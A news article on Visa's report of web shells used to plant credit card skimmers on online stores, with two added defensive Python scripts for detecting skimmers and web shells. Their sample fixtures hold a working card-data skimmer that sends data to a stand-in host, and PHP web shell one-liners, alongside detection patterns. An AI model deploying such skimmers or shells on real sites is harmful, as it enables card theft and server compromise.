Visa Payment Fraud Disruption (PFD), the security division of the global payments operator, warns of a trend that is increasingly popular with bad actors: deploying web shells on compromised servers in order to steal and exfiltrate credit card information.
Web shells are small pieces of code that allow threat actors to maintain persistence on hacked servers, remotely execute arbitrary code or commands, move laterally within the compromised network, and deliver additional payloads.
VISA reports that throughout the past year its security team has observed a growing trend in which attackers use web shells to inject JavaScript-based scripts known as credit card skimmers into compromised online stores. These attacks are known as web skimming, digital skimming, or e-skimming. The skimmers allow an attacker to steal payment card and personal information from online store customers and exfiltrate it over a command-and-control (C2) channel to attacker-controlled servers.
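The skimmer described above reads checkout form fields and ships them off-page, usually from script the merchant did not put there. As an added example (not Visa's tooling, and not code from the article), here is a small audit that parses a checkout page, flags external script hosts outside an allowlist, and flags inline script that combines form-field access with a network sink. The allowlist, the heuristics and the sample page are this example's own constructed assumptions.

```python
"""Added example: flag skimmer-like script in a checkout page.

Not Visa's or any vendor's tooling; the allowlist, the sample page and the
heuristics below are this example's own assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical merchant: the only hosts allowed to serve script on checkout.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "js.stripe.com"}

# Heuristics: a skimmer reads form fields, sends them somewhere, and often
# hides the endpoint or payload with base64 / char-code assembly.
FIELD_ACCESS = re.compile(r"document\.forms|querySelector(?:All)?\(|getElementsBy\w+|\.value\b")
NETWORK_SINK = re.compile(r"\bfetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=")
OBFUSCATION = re.compile(r"\batob\(|\bbtoa\(|fromCharCode|unescape\(")


class ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attribute values
        self.inline = []        # inline script text
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_checkout_page(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (kind, detail) findings for one page, in page order."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = urlparse(src).hostname      # None for relative URLs (same origin)
        if host and host not in allowed_hosts:
            findings.append(("external_script", host))
    for body in p.inline:
        reads = bool(FIELD_ACCESS.search(body))
        sends = bool(NETWORK_SINK.search(body))
        hides = bool(OBFUSCATION.search(body))
        if reads and sends:
            findings.append(("inline_skimmer_pattern", "obfuscated" if hides else "plain"))
    return findings


# Constructed sample checkout page: one unknown CDN host and one inline
# skimmer that hides its exfil URL behind atob() and base64-encodes the card data.
SAMPLE_CHECKOUT = """<html><body>
<form id="checkout"><input name="cc_number"><input name="cvv"></form>
<script src="https://js.stripe.com/v3/"></script>
<script src="/static/app.js"></script>
<script src="//cdn-assets.test/jquery.min.js"></script>
<script>
document.forms[0].addEventListener('submit', function () {
  var d = document.querySelector('[name=cc_number]').value + '|' +
          document.querySelector('[name=cvv]').value;
  new Image().src = atob('aHR0cHM6Ly9jZG4tYXNzZXRzLnRlc3Qv') + '?q=' + btoa(d);
});
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_checkout_page(SAMPLE_CHECKOUT):
        print(kind, detail)
```

Run it against a saved copy of the live checkout page and a known-good build of the same page; a diff in the findings is what matters, since a legitimate payment integration will also read form fields and make requests.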
“Throughout 2020, Visa Payment Fraud Disruption (PFD) identified a trend whereby many eSkimming attacks used web shells to establish a command and control (C2) during the attacks,” VISA said.
PFD has seen at least 45 eSkimming attacks in 2020 using web shells, according to VISA security researchers. In addition, they “noted increasing web shell use across the wider information security threat landscape.”
Attackers mostly used web shells in Magecart attacks to plant backdoors on hacked online store servers and to set up a command-and-control channel over which the stolen credit card information was later transferred.
Among the methods the attackers employed to breach the online shops’ servers were exploiting vulnerabilities in unsecured administrative infrastructure, compromising eCommerce application or website plugins, and attacking outdated or unpatched eCommerce platforms.
In February, the Microsoft Defender Advanced Threat Protection (ATP) team reported a similar trend, finding that the number of web shells deployed on compromised servers had almost doubled since the previous year.
Microsoft’s security team found on average 140,000 web shells on compromised servers each month between August 2020 and January 2021, whereas the figure between July and December 2019 was 77,000.
Image: Microsoft
In April 2020, the US National Security Agency (NSA) and the Australian Signals Directorate (ASD) also warned in a joint report that threat actors were increasingly backdooring vulnerable servers by deploying web shells.
“While the above tactics, techniques and procedures are not an exhaustive list of the various methods and exploits that attackers used in these web shell attacks, they are some of the leading methodologies identified,” VISA added.
“Identifying tactics, such as the use of web shells, also assists in identifying compromises when eSkimmers are not detected on the merchant website.
“The use of web shells to facilitate eSkimming attacks will likely persist, especially as the restrictions around in-person, brick-and-mortar commerce remain in place as the pandemic continues.”
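Visa’s point that web shell tactics can reveal a compromise even when no skimmer is found on the storefront is something a merchant can act on directly. As an added example (not Visa’s, Microsoft’s or the NSA’s tooling, and not code from the article), here is a small triage script that scores PHP source under a web root for common web shell indicators: request input passed to a command-execution function, eval over decoded data, dynamically named function calls on request input, and PHP code hiding in a file with an image or text extension. The indicator list, the weights, the threshold and the sample files are this example’s own constructed assumptions.

```python
"""Added example: score files under a web root for web-shell indicators.

Not Visa's, Microsoft's or the NSA's tooling; the indicators, weights,
threshold and sample files below are this example's own assumptions.
"""
import re

REQ = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"   # PHP request superglobals

# (name, weight, regex). Weights are chosen so that a single benign hit
# (for example one legitimate base64_decode) stays below the threshold.
INDICATORS = [
    ("request_to_exec", 5, re.compile(
        r"\b(?:system|exec|passthru|shell_exec|popen|proc_open)\s*\(\s*" + REQ)),
    ("eval_of_decoded", 5, re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("eval_of_request", 5, re.compile(r"\beval\s*\(\s*" + REQ)),
    ("dynamic_call", 4, re.compile(r"\$\w+\s*\(\s*" + REQ)),        # $f($_POST[...])
    ("assert_of_request", 4, re.compile(r"\bassert\s*\(\s*" + REQ)),
    ("preg_replace_e", 4, re.compile(                                # /e modifier (PHP < 7)
        r"\bpreg_replace\s*\(\s*['\"]/[^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]")),
    ("decode_call", 1, re.compile(r"\b(?:base64_decode|gzinflate|str_rot13)\s*\(")),
    ("upload_hint", 2, re.compile(r"\bmove_uploaded_file\s*\(")),
]
THRESHOLD = 4
PHP_EXTENSIONS = (".php", ".phtml", ".inc")


def score_php(text):
    """Return (score, [indicator names]) for one file's source text."""
    hits = [(name, weight) for name, weight, rx in INDICATORS if rx.search(text)]
    return sum(weight for _, weight in hits), [name for name, _ in hits]


def triage(files, threshold=THRESHOLD):
    """files: {relative path: source text}. Returns {path: indicators} for
    every file whose score reaches the threshold. A PHP open tag in a file
    that is not supposed to be PHP (an uploaded 'image', a cache file) is
    itself a strong signal and is scored here rather than in INDICATORS."""
    flagged = {}
    for path, text in files.items():
        score, names = score_php(text)
        if not path.lower().endswith(PHP_EXTENSIONS) and "<?php" in text:
            names.append("php_in_non_php_file")
            score += 4
        if score >= threshold:
            flagged[path] = names
    return flagged


# Constructed sample tree (paths and contents invented for this example).
SAMPLE_FILES = {
    # classic one-liner dropped into an upload directory
    "wp-content/uploads/2020/11/cache.php":
        "<?php @eval(base64_decode($_POST['c'])); ?>",
    # command shell disguised as an image by a GIF header
    "media/catalog/product/logo.png":
        "GIF89a<?php system($_GET['cmd']); ?>",
    # legitimate application code that happens to use base64_decode once
    "app/code/Vendor/Module/Helper/Data.php":
        "<?php\nfunction decodeToken($t) { return json_decode(base64_decode($t), true); }",
    # lightly obfuscated: function name assembled, then called on request data
    "pub/errors/default/skin.php":
        "<?php $f = 'sys'.'tem'; $f($_REQUEST['x']);",
}

if __name__ == "__main__":
    for path, names in triage(SAMPLE_FILES).items():
        print(path, "->", ", ".join(names))
```

To run this over a real web root, build the `files` mapping by walking the document root and reading each file as text with errors ignored; the scoring is deliberately simple, so treat a hit as a reason to pull the file and its access-log history (POST requests to a freshly created file in an upload or cache directory are the usual confirmation), not as a verdict on its own.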